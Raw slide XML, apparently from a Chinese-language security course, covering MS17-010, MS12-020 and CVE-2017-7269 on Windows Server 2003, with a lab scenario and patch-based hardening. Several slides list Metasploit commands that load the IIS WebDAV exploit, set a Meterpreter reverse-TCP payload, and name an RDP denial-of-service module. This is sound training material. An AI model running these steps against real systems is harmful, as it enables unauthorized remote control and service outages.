                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>项目名称</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>MS17_010</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>漏洞利用与安全加固</a:t>
                      </a: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1010">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832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76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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>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3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>假如不知道靶机的IP地址，如何利用namp进行扫描发现？请尝试测试。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>尝试用安装补丁的方式为漏洞加固并测试验证效果，补丁名称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="仿宋" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>WindowsServer2003-KB2621440-x86-CHS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="0" dirty="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bldLvl="0" animBg="1"/>
      <p:bldP spid="8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295705" y="-203755"/>
              <a:ext cx="1291989"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02</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sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>3.2 Windows服务漏洞</a:t>
              </a:r>
              <a:endParaRPr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kumimoji="1" lang="zh-CN" altLang="en-US" sz="280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2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4416425" y="5194935"/>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lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.2.2 利用CVE-2017-8464漏洞实现LINK文件远程代码执行 </a:t>
            </a:r>
            <a:endPar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lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.了解Windows服务漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.能复现CVE-2017-7269漏洞渗透IIS6.0实现远程控制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:t>Windows服务漏洞是指Windows操作系统提供的某项服务所存在的问题或技术缺陷，是不可避免的，但漏洞有可能受攻击者利用和攻击，给用户造成不可预估的风险。CVE-2017-7269漏洞属于Windows服务漏洞的一种。在早期IIS 6.0和 Windows Server 2003为网络服务器提供完整的解决方案，在网络应用服务器的管理和安全性与可扩展性方面提供了许多新的功能，但随着网络技术发展和变化，IIS 6.0开启WebDAV服务后被爆存在缓存区溢出漏洞导致远程代码执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252730" y="56515"/>
            <a:ext cx="1168273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1699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911225" y="1676400"/>
            <a:ext cx="10459085" cy="2676525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CVE-2017-7269漏洞目前针对 Windows Server 2003 R2 可以稳定利用。该漏洞由华南理工大学信息安全实验室计算机科学与工程学院人员Zhiniang Peng和Chen Wu发现，最早在2016年7,8月份开始被利用。</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WebDAV （Web-based Distributed Authoring and Versioning）是 一种基于HTTP1.1协议的通信协议。它扩展了HTTP 1.1在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法，使应用程序可对Web Server直接读写，并支持写文件锁定(Locking)及解锁(Unlock)，还可以支持文件的版本控制。</a:t>
            </a:r>
            <a:endParaRPr sz="24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lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1、了解拒绝服务的原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2、学会MS12_020漏洞利用和安全加固的方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25273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1699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lang="en-US" sz="2400" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>网络管理员小王，请来专业人员对公司的服务器系统Windows  Server 2003进行漏洞渗透测试，发现服务器系统的IIS可能存在WebDAV服务漏洞，也就是编号为CVE-2017-7269的缓冲区溢出漏洞，这个漏洞属高危等级，为确保服务器安全，小王对这个漏洞进行测试和加固。</a:t>
            </a:r>
            <a:endParaRPr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5255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6127115" cy="1420495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="826135"/>
                <a:gridCol w="1927225"/>
                <a:gridCol w="2315210"/>
                <a:gridCol w="105854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Win2003R2-1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192.138.66.10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靶机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3" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789305" y="4411980"/>
            <a:ext cx="6285865" cy="1083310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr sz="2400" b="0"/>
              <a:t>靶机允许WebDAV服务，如图3-2-1所示，启用80端口，网络互连互通。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482615" descr="图3-2-1 允许WebDAV服务"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178040" y="1200785"/>
            <a:ext cx="4744720" cy="517715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2900"/>
            <a:ext cx="10515600" cy="5961380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.使用search搜索可利用的漏洞，输入“search  ms12-020”命令搜索ms12-020漏洞模块，如图3-1-2所示，显示两个可利用模块。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞检测模块 auxiliary/scanner/rdp/ms12_020_check</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞攻击模块  auxiliary/dos/windows/rdp/ms12_020_maxchannelids</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482623" descr="图3-1-2搜索MS12-020"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238250" y="2647950"/>
            <a:ext cx="7823835" cy="3390900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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48665" y="189865"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>步骤二 CVE-2017-7269漏洞利用设置 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.在Kali Linux终端界面中输入“msfconsole”命令，打开Metasploit框架，如图3-2-2所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482623" descr="图3-2-2打开Metasploit框架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1902460" y="1638935"/>
            <a:ext cx="7172960" cy="4244975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2948940" y="6056630"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-2-2打开Metasploit框架</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56235"/>
            <a:ext cx="10515600" cy="5821045"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.使用search搜索可利用的漏洞，输入“search cve-2017-7269”命令搜索cve-2017-7269漏洞模块，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发现只显示“exploit/windows/iis/iis_webdav_scstoragepathfromurl”可利用漏洞模块，没有显示“exploit/windows/iis/cve_2017_7269”，但不影响后面的操作，如图3-2-3所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3083560" y="5808980"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr b="0"/>
              <a:t>图3-2-3搜索cve-2017-7269模块</a:t>
            </a:r>
            <a:endParaRPr b="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482622" descr="图3-2-3搜索cve-2017-7269模块"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2221230" y="2752090"/>
            <a:ext cx="6957695" cy="2809875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>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32435"/>
            <a:ext cx="10515600" cy="5923915"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>3.使用“use exploit/windows/iis/cve_2017_7269”启用漏洞利用模块，用show options命令显示配置参数，提示需要配置HttpHost和RHOSTS主机IP地址，默认端口80，可利用漏洞系统为Windows Server 2003 R2，如图3-2-4所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3154045" y="6064250"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr b="0"/>
              <a:t>图3-2-4  检测可利用漏洞</a:t>
            </a:r>
            <a:endParaRPr b="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482621" descr="图3-2-4  检测可利用漏洞"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1888490" y="2049145"/>
            <a:ext cx="7572375" cy="4014470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:no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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>4.根据配置参数设置攻击载荷、攻击目标和监听主机参数，如图3-2-5所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设置攻击载荷：set  payload  windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设置HttpHost目标：set  Httphost   192.168.66.10</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设置攻击目标（靶机）：set  rhosts  192.168.66.10</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设置监听主机（kali）：set  lhosts  192.168.66.5</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482620" descr="图3-2-5  设置攻击载荷"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2697480" y="3249930"/>
            <a:ext cx="5970270" cy="2218690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3142615" y="5826125"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-2-5  设置攻击载荷</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15265"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300"/>
              <a:t>5.用show options命令查看最终配置参数，如图3-2-6所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482619" descr="图3-2-6所示查看配置参数"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555115" y="820420"/>
            <a:ext cx="8301355" cy="4391660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
